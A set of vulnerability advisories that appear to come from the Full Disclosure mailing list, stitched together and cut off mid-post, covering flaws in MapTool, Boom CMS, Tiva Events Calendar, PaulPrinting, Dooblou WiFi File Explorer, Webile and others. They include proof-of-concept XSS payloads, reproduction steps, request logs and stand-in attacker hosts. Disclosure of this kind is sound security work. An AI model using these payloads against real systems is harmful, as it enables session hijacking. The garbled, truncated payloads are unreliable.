[+] Chat (Werkzeuge / Tools)

Vulnerable Function(s):
[+] javax.swing.text.html.StyleSheet$BoxPainter
[+] javax.swing.text.html.BlockView.layoutMinorAxis


Proof of Concept (PoC):
===
The remote denial of service vulnerability can be exploited by remote attacker 
or without interaction or local users.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability locally:
1. Install the maptool newst version
2. Start the tool and open a own host
3. Open the message chat box
4. Include the payload and push the send button
5. The software crashs locally by null pointer
Note: open the client again and copy the chat with a cmpgn file
6. Now you can locally import it to crash the host via null pointer

Manual steps to reproduce the vulnerability remotely:
1. Install the maptool newst version
2. Start the tool and join an exisiting party
3. Open the chat
4. Inject the payload with a local js or base64 encoded link and submit it
5. The host receives the chat message and clicks the link the host session 
crashs via null pointer

Payload:


PoC:
testfile.cmpgn

--- Debug Session Logs ---
java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1
at java.desktop/javax.swing.text.html.BlockView.layoutMinorAxis(Unknown Source)
at 
java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.layoutMinorAxis(Unknown
 Source)
at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)
at ja

[FD] MapTool v1.11.5 - Cross Site Scripting Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
MapTool v1.11.5 - Cross Site Scripting Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2319


Release Date:
=
2022-10-11


Vulnerability Laboratory ID (VL-ID):

2319


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool 
come with powerful tools for creating detailed maps
but also a chat function, an initiative tracker, and a detailed token 
management system to create characters, monsters, objects,
and anything you can imagine. MapTool's user interface is highly configurable, 
and features not being used can be hidden out of sight.
The latest version of MapTool can be found on GitHub. MapTool attempts to use 
Semantic Versioning to help groups know whether a change
may break their game or not so they can decide when to upgrade. Exciting new 
features can be tested in development (alpha or beta) builds,
but for your game where stability matters sticking to the major releases is 
recommended. MapTool campaigns saved in newer versions may not
work on older versions, so be careful with your campaign files when trying out 
development builds.

(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool  )
(Download Software:https://www.rptools.net/toolbox/download-rptools-products  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent web 
vulnerability in the official MapTool v1.11.5 software.

Affected Product(s):

Rptools
Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)


Vulnerability Disclosure Timeline:
==
2022-06-03: Researcher Notification & Coordination (Security Researcher)
2022-06-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official MapTool v1.11.5 software.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector
to compromise browser to web-application requests from the application-side.

The vulnerability is located in the Speicher den Nachrichtenverlauf (Save 
Message Logs) function that exports
without a secure encode of html entities. Thus allows remote attackers to send 
malicious payloads that are not
visible in the chat but being saved to the exported html file. Opening the html 
file directly executes the injected
script code payloads on the local computer system. The vulnerability can be 
used by actors to form malicious files
for malware, phishing or data exfiltration after locat compromise.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Vulnerable Module(s):
[+] Chat

Affected Module(s):
[+] Speicher den Nachrichtenverlauf


Proof of Concept (PoC):
===
The persistent and non-persistent input validation web vulnerabilities can be 
exploited by remote attackers without user account and with or without low user 
interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


PoC: Payload
http://evil.source/malicious.jsp?inject=eval(name)" 
name="alert(1337)">


Manual steps to reproduce the vulnerability:
1. Install the linux, windows or macos map software
2. Open the chat and inject payload
3. Send the input to execute
4. Save the chat logs by settings (default html)
5. Open the exported html file with the chat communication
Note: Opening the file directly executes the payload
6. Successful reproduce of the non-persistent and persistent input validation 
vulnerability


PoC: Exploitation (test.html)





Anonymer Benutzer: evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT]





"antlr.collections.AST.equalsTree(antlr.collections.AST)"

[FD] RRX IOB LP v1.0 - DNS Cache Snooping Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
RRX IOB LP v1.0 - DNS Cache Snooping Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2261

Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspot


Release Date:
=
2022-10-11


Vulnerability Laboratory ID (VL-ID):

2261


Common Vulnerability Scoring System:

5.3


Vulnerability Class:

Multiple


Current Estimated Price:

2.000€ - 3.000€


Product & Service Introduction:
===
This product, solution or service ("Product") contains third-party software 
components listed in this document. These components are Open Source
Software licensed under a license approved by the Open Source Initiative 
(www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")
and/or commercial or freeware software components. With respect to the OSS 
components, the applicable OSS license conditions prevail over any other
terms and conditions covering the Product. The OSS portions of this Product are 
provided royalty-free and can be used at no charge.

If SIEMENS has combined or linked certain components of the Product with/to OSS 
components licensed under the GNU LGPL version 2 or later as per the
definition of the applicable license, and if use of the corresponding object file is not 
unrestricted ("LGPL Licensed Module", whereas the LGPL
Licensed Module and the components that the LGPL Licensed Module is combined with or 
linked to is the "Combined Product"), the following additional
rights apply, if the relevant LGPL license criteria are met: (i) you are 
entitled to modify the Combined Product for your own use, including but not
limited to the right to modify the Combined Product to relink modified versions 
of the LGPL Licensed Module, and (ii) you may reverse-engineer the
Combined Product, but only to debug your modifications. The modification right 
does not include the right to distribute such modifications and you
shall maintain in confidence any information resulting from such 
reverse-engineering of a Combined Product.

Certain OSS licenses require SIEMENS to make source code available, for 
example, the GNU General Public License, the GNU Lesser General Public License
and the Mozilla Public License. If such licenses are applicable and this 
Product is not shipped with the required source code, a copy of this source
code can be obtained by anyone in receipt of this information during the period 
required by the applicable OSS licenses by contacting the following address.


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a dns snooping 
vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source 
Software) with Hotspot Siemens Portal.


Vulnerability Disclosure Timeline:
==
2020-08-03: Researcher Notification & Coordination (Security Researcher)
2020-08-04: Vendor Notification (Security Department)
2020-08-27: Vendor Response/Feedback #1 (Security Department)
2020-11-10: Vendor Response/Feedback #2 (Security Department)
2021-01-30: Security Acknowledgements (Security Department)
2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)
2022-10-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A dns cache snooping vulnerability has been discovered in the official Rhein 
Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot 
Siemens Portal.
The vulnerability allows remote attackers to determine resolved sites and name 
servers to followup with manipulative interactions.

The vulnerability allows remote attackers to determine which domains have 
recently been resolved via this name server, and therefore which hosts have 
been recently visited.
For instance, if an attacker was interested in whether your company utilizes 
the online services of a particular financial institution, they would be able 
to use this attack
to build a statistical model regarding company usage of that financial 
institution. Of course, the attack can also be usead to find B2B partners, 
web-surfing patterns, external
mail servers, and more. If this is an internal DNS server not accessible to 
outside networks, attacks would be limited to the internal network. This may 
include employees,
consultants and potentially users on a guest network or WiFi co

[FD] Boom CMS v8.0.7 - Cross Site Scripting Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Boom CMS v8.0.7 - Cross Site Scripting Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2274


Release Date:
=
2023-07-03


Vulnerability Laboratory ID (VL-ID):

2274


Common Vulnerability Scoring System:

5.3


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Boom is a fully featured, easy to use CMS. More than 10 years, and many 
versions later, Boom is an intuitive, WYSIWYG CMS that makes life
easy for content editors and website managers. Working with BoomCMS is simple. 
It's easy and quick to learn and start creating content.
It gives editors control but doesn't require any technical knowledge.

(Copy of the Homepage:https://www.boomcms.net/boom-boom  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site vulnerability in the Boom CMS v8.0.7 web-application.


Affected Product(s):

UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent script code injection web vulnerability has been discovered in the 
official Boom CMS v8.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The vulnerability is located in the input fields of the album title and album 
description in the asset-manager module.
Attackers with low privileges are able to add own malformed albums with 
malicious script code in the title and description.
After the inject the albums are being displayed in the backend were the execute 
takes place on preview of the main assets.
The attack vector of the vulnerability is persistent and the request method to 
inject is post. The validation tries to parse
the content by usage of a backslash. Thus does not have any impact to inject 
own malicious
java-scripts because of its only performed for double- and single-quotes to 
prevent sql injections.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] assets-manager (album)

Vulnerable Function(s):
[+] add

Vulnerable Parameter(s):
[+] title
[+] description

Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to 
provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!


Payload(s):

alert(document.cookie)
test


--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 
Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 
1!]>","description":""><[INJECTED SCRIPT CODE PAYL

[FD] Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2278


Release Date:
=
2023-07-04


Vulnerability Laboratory ID (VL-ID):

2278


Common Vulnerability Scoring System:

5.4


Vulnerability Class:

Script Code Injection


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple html 
injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 
web-application.


Affected Product(s):

ActiveITzone
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple html injection web vulnerabilities has been discovered in the official 
Active Super Shop Multi-vendor CMS v2.5 web-application.
The web vulnerability allows remote attackers to inject own html codes with 
persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, 
phone and address parameters of the manage profile and products branding module.
Remote attackers with privileged accountant access are able to inject own 
malicious script code in the name parameter to provoke a persistent execution on
profile view or products preview listing. There are 3 different privileges that 
are allowed to access the backend like the accountant (low privileges), the
manager (medium privileges) or the admin (high privileges). Accountants are 
able to attack the higher privileged access roles of admins and manager on 
preview
of the elements in the backend to compromise the application. The request 
method to inject is post and the attack vector is persistent located on the 
application-side.

Successful exploitation of the vulnerabilities results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious source 
and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Details

Vulnerable Parameter(s):
[+] name
[+] phone
[+] address

Affected Module(s):
[+] manage profile
[+] products branding


Proof of Concept (PoC):
===
The html injection web vulnerabilities can be exploited by remote attackers 
with privileged accountant access and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Exploitation: Payload
https://[DOMAIN]/[PATH]/[PICTURE].*";>


Vulnerable Source: manage_admin & branding


Manage Details

https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/";  
class="form-horizontal" method="post" accept-charset="utf-8">


Name

https://MALICIOUS-DOMAIN.com/gfx/logo-header.png";>" id="demo-hor-1" class="form-control required">


Email





Phone

https://MALICIOUS-DOMAIN.com/gfx/logo-header.png";>" id="demo-hor-3" class="form-control">



--- PoC Session Logs (POST) ---
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 
Firefox/91.0
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; 
boundary=---280242453224137385302547344680
Content-Length: 902
Origin:https://assm_cms.localhost:8080
Connection: keep-alive
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
https://assm_cms.localhost:8080/shop/admin/manage_admin/
Host: assm_cms.localhost:8080
User-Agent: Mozilla

[FD] Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2276


Release Date:
=
2023-07-05


Vulnerability Laboratory ID (VL-ID):

2276


Common Vulnerability Scoring System:

5


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Events Calendar For PHP is a powerful PHP calendar script that can be easily 
integrated and used with various PHP projects,
such as scheduler, event handler, etc. The calendar is simple to install, 
deploy, and use. It is suitable for all types of
service businesses to get online reservations without any hassles.

(Copy of the 
Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent script 
code inject vulnerability in the Tiva Events Calender v1.4 web-application.


Affected Product(s):

tiva_theme
Product: Tiva Events Calender - Calender PHP (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-04-03: Researcher Notification & Coordination (Security Researcher)
2021-04-04: Vendor Notification 1 (Security Department)
2021-06-24: Vendor Notification 2 (Security Department)
2021-07-13: Vendor Notification 3 (Security Department)
-**-**: Vendor Response/Feedback (Security Department)
-**-**: Vendor Fix/Patch (Service Developer Team)
-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official Tiva Events Calender v1.4 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote 
attackers privileged user accounts are able to inject
own malicious script codes as name. Thus results in a persistent execute of the 
script code in the backend on edit but as well in the
frontend (index) were the event is being displayed after the submit (save) via 
post method request. In the same direction it is possible
to inject malformed client-side executable script code in get request to 
trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected frontend / backend 
application modules.

Request Method(s):
[+] POST / GET

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] index.php (Frontend on Event Preview)
[+] edit.php (Backend on Edit ID)


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Exploitation: Payload
%20"


Vulnerable Source: Frontend (Index)
8
9
event1"%20"10
111213
14


Vulnerable Source: Backend (Edit ID)

 Edit 
File




Report successfully saved.   


Name *

" required />



--- PoC Session Logs (POST) ---
https://tiva-cal.localhost:8080/admin/report/edit.php
Host: tiva-cal.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; 
boundary=---249785717017581481612148649683
Content-Length: 745
Origin:https://tiva-cal.localhost:8080
Connection: keep-alive
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11
name="%20%20"&type=1&time=20-08-2021&file=temp.txt&save=
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html
content-length: 1283
etag: "503-53ed12f4ca761"
accept-ranges: bytes
strict-transport-security: max-age=15768000; includeSubDomains
-
https://tiva-cal.localhost:8080/admin/report/evil.source
Host: tiva-cal.localhost:8080
User-Agent: Mozilla/5.0 (Wi

[FD] PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2286


Release Date:
=
2023-07-17


Vulnerability Laboratory ID (VL-ID):

2286


Common Vulnerability Scoring System:

5.2


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
PaulPrinting is designed feature rich, easy to use, search engine friendly, 
modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a non-persistent 
cross site vulnerability in the PaulPrinting (v2018) cms web-application.


Vulnerability Disclosure Timeline:
==
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Open Authentication (Anonymous Privileges)


User Interaction:
=
Medium User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A client-side cross site scripting vulnerability has been discovered in the 
official PaulPrinting (v2018) cms web-application.
Remote attackers are able to manipulate client-side requests by injection of 
malicious script code to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search 
input field with the insecure validated q parameter
affecting the delivery module. Remote attackers are able to inject own 
malicious script code to the search input to provoke a client-side
script code execution without secure encode. The request method to execute is 
GET and the attack vector is non-persistent.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.


Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts


Proof of Concept (PoC):
===
The non-persistent xss web vulnerability can be exploited by remote attackers 
with low privileged user account and medium user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a";>


--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a";>
Host: codeawesome.in
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; 
session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source:  (Search - delivery?q=)

https://codeawesome.in/printing/account/delivery";  class="btn btn-primary mt-4 
mb-2 float-right">




">





Security Risk:
==
The security risk of the cross site scripting web vulnerability with 
non-persistent attack vector is estimated as medium.


Credits & Authors:
==
Vulnerability-Lab [Research Team] 
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or 
incidental damages so the foregoing limitation may not apply.
We do 

[FD] Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2317


Release Date:
=
2023-07-04


Vulnerability Laboratory ID (VL-ID):

2317


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Multiple


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Browse, download and stream individual files that are on your Android device, 
using a web browser via a WiFi connection.
No more taking your phone apart to get the SD card out or grabbing your cable 
to access your camera pictures and copy across your favourite MP3s.

(Copy of the 
Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple web 
vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile 
android wifi web-application.

Affected Product(s):

Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) 
(Web-Application)


Vulnerability Disclosure Timeline:
==
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Multiple input validation web vulnerabilities has been discovered in the 
official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser to web-application
requests from the application-side.

The vulnerabilities are located in the `search`, `order`, `download`, `mode` 
parameters. The requested content via get method request is insecure validated
and executes malicious script codes. The attack vector is non-persistent and 
the rquest method to inject is get. Attacker do not need to be authorized to
perform an attack to execute malicious script codes. The links can be included 
as malformed upload for example to provoke an execute bby a view of the
front- & backend of the wifi explorer.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects to malicious
source and non-persistent manipulation of affected application modules.


Proof of Concept (PoC):
===
The input validation web vulnerabilities can be exploited by remote attackers 
without user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the 
provided information and steps below to continue.


PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/https://evil.source";  
onmouseover=alert(document.domain)>PLEASE CLICK PATH TO RETURN INDEX
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX


Vulnerable Sources: Execution Points
ERROR
Cannot find file or
directory! /storage/emulated/0/Download/https://evil.source";  
onmouseover="alert(document.domain)">PLEASE CLICK USER PATH TO RETURN
INDEX  >> Back To
Files >>
-



 
PLEASE CLICK PATH TO RETURN INDEX&search=a">
|
PLEASE CLICK PATH TO RETURN INDEX&search=a">
|
PLEASE CLICK PATH TO RETURN I
-
  >"https://evil.source";  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"
style="">Download https://evil.source";  
onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete 
Create Copy Zip Unzip
   

[FD] Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2321


Release Date:
=
2023-07-03


Vulnerability Laboratory ID (VL-ID):

2321


Common Vulnerability Scoring System:

5.5


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Webile, is a local area network cross-platform file management tool based on 
http protocol. Using the personal mobile phone as a server in
the local area network, browsing mobile phone files, uploading files, 
downloading files, playing videos, browsing pictures, transmitting data,
statistics files, displaying performance, etc. No need to connect to the 
Internet, you can browse files, send data, play videos and other
functions through WiFi LAN or mobile phone hotspot, and no additional data 
traffic will be generated during data transmission. Support Mac,
Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the 
Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US
  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple persistent 
web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.

Affected Product(s):

Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Guest Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Multiple persistent input validation web vulnerabilities has been discoveredin 
the Webile v1.0.1 Wifi mobile android web application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent input validation web vulnerabilities are located in the send and 
add function. Remote attackers are able to inject own malicious
script codes to the new_file_name and i parameter post method request to 
provoke a persistent execution of the malformed content.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i


Proof of Concept (PoC):
===
The persistent input validation web vulnerabilities can be exploited by remote 
attackers without user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Vulnerable Source: Send
Send message to phone listing

Message

20:10:11title="Copy" onclick="copy(1658081411827)">  

test2"

history logs messages




Message
Date
Action





 test2"
2022/07/17 20:10


  


  




--- PoC Session Logs #1 (POST) ---  (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 
Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
